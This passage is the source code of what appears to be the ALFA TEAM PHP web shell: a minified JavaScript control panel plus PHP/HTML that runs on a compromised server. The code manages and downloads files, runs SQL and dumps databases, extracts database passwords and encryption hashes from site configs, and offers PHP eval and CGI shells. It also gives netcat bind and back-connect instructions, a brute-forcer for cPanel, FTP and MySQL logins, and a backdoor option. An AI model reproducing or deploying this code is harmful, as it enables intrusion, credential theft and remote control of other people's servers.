pagenum=d.querySelector(".page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie("alfa_files_page_number")),setCookie("alfa_files_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return loadPopUpDatabase(e,t),!1;"FilesMan"==a?(alfaloader("filesman_holder","none"),d.getElementsByClassName("ajaxarea")[0].innerHTML=e,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e)):((options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit())},!1,""==alfa_before_do_action_id?"."+a:alfa_before_do_action_id),alfa_before_do_action_id="",c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e?(i=$("filesman_holder")).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e&&($("filesman_holder").style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fsu(e){var a=e.getAttribute("db_id");alfaloader(a,"block");for(var t={},i=0;i<e.elements.length;i++)"submit"!=e.elements[i].type&&(t[e.elements[i].name]=e.elements[i].value);for(i in mysql_cache[a])mysql_cache[a][i]=alfab64(mysql_cache[a][i]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(t))+"&c="+alfab64(c_)+"&charset="+mysql_cache[a].charset+"&type="+mysql_cache[a].type+"&sql_host="+mysql_cache[a].host+"&sql_login="+mysql_cache[a].user+"&sql_pass="+mysql_cache[a].pass+"&sql_base="+mysql_cache[a].db+"&sql_count="+mysql_cache[a].count+"¤t_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a,"update"),evalJS(e),alfaloader(a,"none")},!1,a)}function fs(f,e,el){var act_id=el.getAttribute("db_id");mysql_cache.hasOwnProperty(act_id)||(mysql_cache[act_id]={}),alfaloader(act_id,"block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache[act_id].host,user=f.sql_login?f.sql_login.value:mysql_cache[act_id].user,pass=f.sql_pass?f.sql_pass.value:mysql_cache[act_id].pass,db=f.sql_base?f.sql_base.value:mysql_cache[act_id].db,type=f.type?f.type.value:mysql_cache[act_id].type,charset=f.charset?f.charset.value:mysql_cache[act_id].charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache[act_id].count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1="4"==f?"dumpfile":"droptbl";var obj={},id=d.querySelector("#"+act_id+" .dumpfile-value"),tbl_list=d.querySelectorAll("#"+act_id+" input[name=tbl\\[\\]]");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<tbl_list.length;++i)tbl_list[i].checked&&obj.tbl.push(tbl_list[i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"¤t_mysql_id="+alfab64(act_id)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,act_id)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong> Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){".FilesMan"==a&&(a="filesman_holder");var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){d.querySelector("#rightclick_menu > a[name=newtab]").setAttribute("href","#action=fileman&path="+e.target.getAttribute("path"));var a=e.clientX,t=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(a,t),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,u=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var _=getCookie("alfa_history_files");try{for(var p in editor_files=JSON.parse(_),editor_files)insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){u=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&u?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,s="id_delete_"+e,d=$(t).getAttribute("ftype");"folder"==d&&(d="dir"),"file"==d?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+d+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+d+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+d+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+d+"')"),$(s).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(){for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&(d.files.elements[i].checked=d.files.elements[0].checked)}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
2063</script>
2064<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
2065<input type='hidden' name='a' value='dlfile'>
2066<input type='hidden' name='c' value=''>
2067<input type='hidden' name='file' value=''>
2068</form>
2069<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
2070<div id='a_loader'><img src='".__showicon('loader')."'></div>";
2071$cmd_uname = alfaEx("uname -a",false,false);
2072$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
2073if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
2074echo '
2075</head>
2076<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
2077<div id="up_bar_holder"></div>
2078<div class="whole">
2079<form method="post" name="mf" style="display:none;">
2080<input type="hidden" name="a">
2081<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
2082for($s=1;$s<=10;$s++){
2083echo '<input type="hidden" name="alfa'.$s.'">';
2084}
2085echo '<input type="hidden" name="charset">
2086</form>
2087<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
2088<div class="header"><table width="100%" border="0">
2089<tr>
2090<td width="3%"><span class="header_vars">Uname:</span></td>
2091<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
2092</tr>
2093<tr>
2094<td><span class="header_vars">User:</span></td>
2095<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
2096<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
2097</tr>
2098<tr>
2099<td><span class="header_vars">PHP:</span></td>
2100<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
2101</tr>
2102<tr>
2103<td><span class="header_vars">ServerIP:</span></td>
